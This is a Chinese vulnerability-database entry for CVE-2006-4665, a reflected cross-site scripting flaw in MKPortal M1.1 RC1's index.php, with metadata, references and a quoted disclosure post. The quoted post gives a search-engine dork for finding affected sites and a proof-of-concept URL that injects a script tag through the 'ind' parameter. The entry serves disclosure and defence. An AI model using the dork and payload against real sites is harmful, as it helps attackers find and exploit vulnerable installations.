MKPortal M1.1 Rc 'index.php'跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193578 漏洞类型 跨站脚本
发布时间 2006-09-08 更新时间 2006-09-08
CVE编号 CVE-2006-4665 CNNVD-ID CNNVD-200609-121
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/83638
https://cxsecurity.com/issue/WLB-2006090062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-121
|漏洞详情
MKPortalM1.1Rc1的index.php中的跨站脚本攻击(XSS)漏洞,远程攻击者可以通过可能与PHP_SELF变量有关的ind参数注入任意Web脚本或HTML。
|漏洞EXP
xxs in MKPortal M1.1 Rc1

info:

file:index.php

google======>MKPortal M1.1 Rc1 ?2003-2005

Exp:

http://www.sitename.com/index.php?ind="><script>alert(1);</script>

--------------------------------------

By Crack_man

Thank to all friend in www.lezr.com/vb
|受影响的产品
MKPortal MKPortal 1.1 RC1
|参考资料

来源:XF
名称:mkportal-index-xss(28812)
链接:http://xforce.iss.net/xforce/xfdb/28812
来源:BUGTRAQ
名称:20060907xxsinMKPortalM1.1
链接:http://www.securityfocus.com/archive/1/archive/1/445511/100/0/threaded
来源:VUPEN
名称:ADV-2006-3518
链接:http://www.frsirt.com/english/advisories/2006/3518
来源:SECUNIA
名称:21821
链接:http://secunia.com/advisories/21821
来源:SREASON
名称:1534
链接:http://securityreason.com/securityalert/1534